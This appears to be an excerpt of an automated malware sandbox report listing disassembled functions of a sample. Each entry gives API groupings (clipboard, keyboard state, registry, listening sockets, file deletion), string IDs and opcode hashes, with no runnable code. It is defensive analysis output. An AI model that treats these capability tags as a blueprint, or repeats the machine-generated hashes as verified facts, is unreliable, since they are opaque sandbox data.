                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2880407647-0
                                                                                • Opcode ID: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                • Instruction ID: e3fdd2b745cda9ba9f6573412b5e5aef3f087a2474daf6198cca6e41510472e9
                                                                                • Opcode Fuzzy Hash: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                • Instruction Fuzzy Hash: F703F672A195C28BD7B59E34D440FF9B7A5FB8478CF801135DA0A6BB48DB38E960DB10
                                                                                Function 00007FF79F900A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                • String ID:
                                                                                • API String ID: 3222323430-0
                                                                                • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                • Instruction ID: 6806a7e0d53d4c4ae981a9afbe93a059a115c6d81049e460f77966818d7102ae
                                                                                • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                • Instruction Fuzzy Hash: 72716C21A0968282EA70BB31D8546FCA361FF84BA4FC54435D94E877A9DF2CE555C360
                                                                                Function 00007FF79F91C6D4 Relevance: 28.9, APIs: 19, Instructions: 396windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                • String ID:
                                                                                • API String ID: 1015379403-0
                                                                                • Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                                • Instruction ID: 62d668c710a6585e34e2e3f605df955506fb3d3e81523d1d8ec64dad173a3098
                                                                                • Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                                • Instruction Fuzzy Hash: FB02A261B08AC289EB70EF3198846F9A761FB847A4F844231DA5D97ADCCF7CE545C710
                                                                                Function 00007FF79F90206C Relevance: 27.1, APIs: 18, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$Load$ErrorInfoLast
                                                                                • String ID:
                                                                                • API String ID: 3215588206-0
                                                                                • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                • Instruction ID: 1dcc4caeb9b29f115b3fae1a911881b06071988115cce2f975b0d5dbafcbfbdb
                                                                                • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                • Instruction Fuzzy Hash: B351BF32B0CB428AEB58AF74F9081BD73A1EB48724F554439D91E87B98DE3CE0558354
                                                                                Function 00007FF79F8B529C Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                • API String ID: 281475176-2761157908
                                                                                • Opcode ID: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                • Instruction ID: ef670944601d195f6b9c99b542eee0d4706125d49d91c7cd6047b9b123030d79
                                                                                • Opcode Fuzzy Hash: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                • Instruction Fuzzy Hash: DDB2F772A082C28BE7B5AE75D440EFDB7A1FB4438DF905135DA0A5BB88DF38E5149B10
                                                                                Function 00007FF79F910AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseValue$ConnectCreateRegistry
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 3314541760-966354055
                                                                                • Opcode ID: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                                                • Instruction ID: d181e9575aedb1815022fbc91a26cf75b71cecda539edef560a1d0caa8f9fb02
                                                                                • Opcode Fuzzy Hash: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                                                • Instruction Fuzzy Hash: 4C029022B08A8285EB60EF36D4916FDB764FB88F98B849032DE0D4775ADF38E455C750
                                                                                Function 00007FF79F875F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: P
                                                                                • API String ID: 0-3110715001
                                                                                • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                • Instruction ID: 2343fdca08baadd8d6fb5c6775eb93d1d057cbded58595aa7bd990317fb14240
                                                                                • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                • Instruction Fuzzy Hash: 92A1CE32A0868186E774EF35D804AEEF760FB84B98F908136DA5E47A98CF3CE555D710
                                                                                Function 00007FF79F8F72A8 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 284timefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                • API String ID: 3232708057-3289030164
                                                                                • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                • Instruction ID: 4dd67c1022ba8531224f6a945e418369e7556952b180321212829241d4c056ac
                                                                                • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                • Instruction Fuzzy Hash: BAD1CE22B18A9295EB60FB71D8419FEE321FB80794FC00032EA4D57AA9DF7CD158D760
                                                                                Function 00007FF79F8ED87C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: SendString
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 890592661-1007645807
                                                                                • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                • Instruction ID: 563c32d7bec06a418d388df72c1dcc75e8e9148a39ab3633ac75baa900adfd40
                                                                                • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                • Instruction Fuzzy Hash: A221AF26B085D291EB70FB30E854BFAA760BBA8758FC04031D96D8396CDE2CD619C720
                                                                                Function 00007FF79F8E7E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                • Instruction ID: a6fe90383acc217eb94b64e8142dabb9e626fc262384040a27e163db78cb3be7
                                                                                • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                • Instruction Fuzzy Hash: EB71E512A0C2C295FBB4BB34A400BFDAB60EB45B88FD90079D69D07286CF5DD926D731
                                                                                Function 00007FF79F8DC858 Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 1255039815-0
                                                                                • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                • Instruction ID: 9a68577607e232d8290975b791acdbe7b03e3d0bef2084c264a9ebc79aaf365b
                                                                                • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                • Instruction Fuzzy Hash: 41619C22B046918AEB60EF71D8489FCB7A4BF45B98F844036DE0E57798DF38D845D360
                                                                                Function 00007FF79F8F59D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                • Instruction ID: f42b03da64e402c21e9c57656ce01df1dca855f919423202afd780a159b67e94
                                                                                • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                • Instruction Fuzzy Hash: A241C232A08A8289EBA0FB35C4815FCB371FB98B94F944432CA0D47759DF38D4A5D360
                                                                                Function 00007FF79F906C34 Relevance: 15.3, APIs: 10, Instructions: 296fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2395222682-0
                                                                                • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                • Instruction ID: 57a434995f661fcf619a060ad11bb7ab02dfec87a31e6017bd8a59f2135731c4
                                                                                • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                • Instruction Fuzzy Hash: D6D15E36B04B8686EB20AF75D4402EDA3B1FB98B9CB954036DE4D97B58DF38E449C350
                                                                                Function 00007FF79F900D24 Relevance: 15.1, APIs: 10, Instructions: 86clipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                • Instruction ID: e075071276177a5605b4bbf814b08677a4ae6223f6ba295361d072dd2a013d8f
                                                                                • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                • Instruction Fuzzy Hash: 04418072A086C282EB64BF26D8943BCB760FF84BA5F854434CA0E47766CF7CE0558720
                                                                                Function 00007FF79F8EB7C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 4047182710-1173974218
                                                                                • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                • Instruction ID: 48ff0b33db898ab3412a73e448502eeb05ffe30cc4ad11df527db18fd2b063a8
                                                                                • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                • Instruction Fuzzy Hash: 86817522A086C295EBA0FB70E4416FDA764EF943A4FC40132EA4E476A9DF3CD595D720
                                                                                Function 00007FF79F903940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                • String ID:
                                                                                • API String ID: 540024437-0
                                                                                • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                • Instruction ID: 8a0170d408f09c50a7bb598b4c07cc9b28c4fc7ac8f2e54235415840e6702a9a
                                                                                • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                • Instruction Fuzzy Hash: 45419062A086C286EB60FF3694406BCF760FB85BA4F994530DA5E87796CF3CD1518714
                                                                                Function 00007FF79F8EBC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 2649000838-1173974218
                                                                                • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                • Instruction ID: b52120b126c5d66c270eb8c9b9cef37891acc0b2194a0e690be8fd21773a036d
                                                                                • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                • Instruction Fuzzy Hash: BD416221A28AC292EAA0FB30E840AEDE364FB94760FD01131EA5E47699DF7CD555D720
                                                                                Function 00007FF79F8AAF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
